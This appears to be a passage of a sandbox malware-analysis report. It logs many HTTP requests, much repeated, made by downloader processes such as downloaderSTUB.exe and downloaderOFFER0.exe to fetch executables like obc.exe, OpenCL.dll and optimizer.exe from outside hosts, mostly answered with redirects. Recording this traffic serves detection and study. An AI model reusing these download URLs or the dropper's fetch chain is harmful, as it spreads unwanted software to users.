    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 17
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:57 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 17
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 17
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 23
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:54 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:55 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:55 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:55 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:55 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:55 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:56 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:56 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 19
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 19
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 19
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 19
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 19
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 20
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:57 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 20
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 20
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 20
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 23
  • flag-us
    GET
    http://openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    216.239.32.21:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: http://www.openbitcoin.org/static/dist/OpenCL.dll
    Date: Mon, 25 Dec 2023 11:00:01 GMT
    Content-Type: text/html; charset=UTF-8
    Server: ghs
    Content-Length: 246
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:01 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-us
    GET
    http://www.directdownloader.com/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    162.255.119.249:80
    Request
    GET /DirectDownloaderInstaller.exe HTTP/1.0
    Host: www.directdownloader.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.1 302 Found
    Date: Mon, 25 Dec 2023 11:00:02 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 113
    Connection: close
    Location: http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    X-Served-By: Namecheap URL Forward
    Server: namecheap-nginx
  • flag-us
    GET
    http://www.directdownloader.com/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    162.255.119.249:80
    Request
    GET /toolbars/optimizer.exe HTTP/1.0
    Host: www.directdownloader.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.1 302 Found
    Date: Mon, 25 Dec 2023 11:00:05 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 106
    Connection: close
    Location: http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    X-Served-By: Namecheap URL Forward
    Server: namecheap-nginx
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:02 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    142.250.200.4:80
    Request
    GET /enterprise/apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: www.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 284
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Expires: Mon, 25 Dec 2023 11:29:34 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 28
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:14 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    142.250.200.46:80
    Request
    GET /apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: enterprise.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 266
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 39
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:02 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:02 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:03 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:03 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:09 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    142.250.200.4:80
    Request
    GET /enterprise/apps/business/products.html/toolbars/optimizer.exe HTTP/1.0
    Host: www.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 277
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Expires: Mon, 25 Dec 2023 11:29:34 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 33
  • flag-gb
    GET
    http://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    142.250.200.46:80
    Request
    GET /apps/business/products.html/toolbars/optimizer.exe HTTP/1.0
    Host: enterprise.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://gsuite.google.com/products.html/toolbars/optimizer.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 259
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 32
  • flag-gb
    GET
    http://gsuite.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    216.58.213.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: gsuite.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 32
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
